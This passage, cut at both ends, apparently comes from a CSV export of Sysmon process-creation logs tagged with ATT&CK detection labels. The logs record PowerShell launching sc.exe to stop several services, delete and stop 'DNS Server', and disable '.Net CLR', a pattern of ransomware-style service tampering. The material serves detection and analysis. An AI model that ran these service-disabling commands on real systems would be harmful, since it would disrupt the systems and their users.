""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Config \"".Net CLR\"" Start= Disabled",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:30.154168300Z"",""eventRecordID"":""2769"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:30.151\r\nProcessGuid: {df9fc3d3-b396-5ecf-0000-001097732100}\r\nProcessId: 2872\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Config \"".Net CLR\"" Start= Disabled\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:30.151"",""processGuid"":""{df9fc3d3-b396-5ecf-0000-001097732100}"",""processId"":""2872"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Config \\\"".Net CLR\\\"" Start= Disabled"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:00.627",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:30.124 +ProcessGuid: {df9fc3d3-b396-5ecf-0000-0010e0712100} +ProcessId: 2128 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop SuperProServer +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop SuperProServer",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:30.126724300Z"",""eventRecordID"":""2767"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:30.124\r\nProcessGuid: {df9fc3d3-b396-5ecf-0000-0010e0712100}\r\nProcessId: 2128\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop SuperProServer\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:30.124"",""processGuid"":""{df9fc3d3-b396-5ecf-0000-0010e0712100}"",""processId"":""2128"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop SuperProServer"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:00.557",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:30.085 +ProcessGuid: {df9fc3d3-b396-5ecf-0000-00105c6f2100} +ProcessId: 5612 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop Serhiez +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop Serhiez",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:30.089882900Z"",""eventRecordID"":""2764"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:30.085\r\nProcessGuid: {df9fc3d3-b396-5ecf-0000-00105c6f2100}\r\nProcessId: 5612\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop Serhiez\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:30.085"",""processGuid"":""{df9fc3d3-b396-5ecf-0000-00105c6f2100}"",""processId"":""5612"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop Serhiez"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:00.509",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:30.059 +ProcessGuid: {df9fc3d3-b396-5ecf-0000-0010ae6d2100} +ProcessId: 1088 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Delete ""DNS Server"" +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Delete \""DNS Server\""",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:30.062439100Z"",""eventRecordID"":""2762"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:30.059\r\nProcessGuid: {df9fc3d3-b396-5ecf-0000-0010ae6d2100}\r\nProcessId: 1088\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Delete \""DNS Server\""\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:30.059"",""processGuid"":""{df9fc3d3-b396-5ecf-0000-0010ae6d2100}"",""processId"":""1088"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Delete \\\""DNS Server\\\"""",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:00.485",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:30.040 +ProcessGuid: {df9fc3d3-b396-5ecf-0000-0010886c2100} +ProcessId: 7812 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop ""DNS Server"" +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop \""DNS Server\""",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:30.043139600Z"",""eventRecordID"":""2761"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:30.040\r\nProcessGuid: {df9fc3d3-b396-5ecf-0000-0010886c2100}\r\nProcessId: 7812\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop \""DNS Server\""\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:30.040"",""processGuid"":""{df9fc3d3-b396-5ecf-0000-0010886c2100}"",""processId"":""7812"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop \\\""DNS Server\\\"""",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:00.416",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:30.004 +ProcessGuid: {df9fc3d3-b396-5ecf-0000-0010e9692100} +ProcessId: 7588 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop Zational +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop Zational",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:30.006018000Z"",""eventRecordID"":""2758"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:30.004\r\nProcessGuid: {df9fc3d3-b396-5ecf-0000-0010e9692100}\r\nProcessId: 7588\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop Zational\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:30.004"",""processGuid"":""{df9fc3d3-b396-5ecf-0000-0010e9692100}"",""processId"":""7588"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop Zational"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:00.375",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:29.963 +ProcessGuid: {df9fc3d3-b395-5ecf-0000-00100f672100} +ProcessId: 7288 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop AxInstSV +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop AxInstSV",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:29.966116000Z"",""eventRecordID"":""2755"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:29.963\r\nProcessGuid: {df9fc3d3-b395-5ecf-0000-00100f672100}\r\nProcessId: 7288\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: 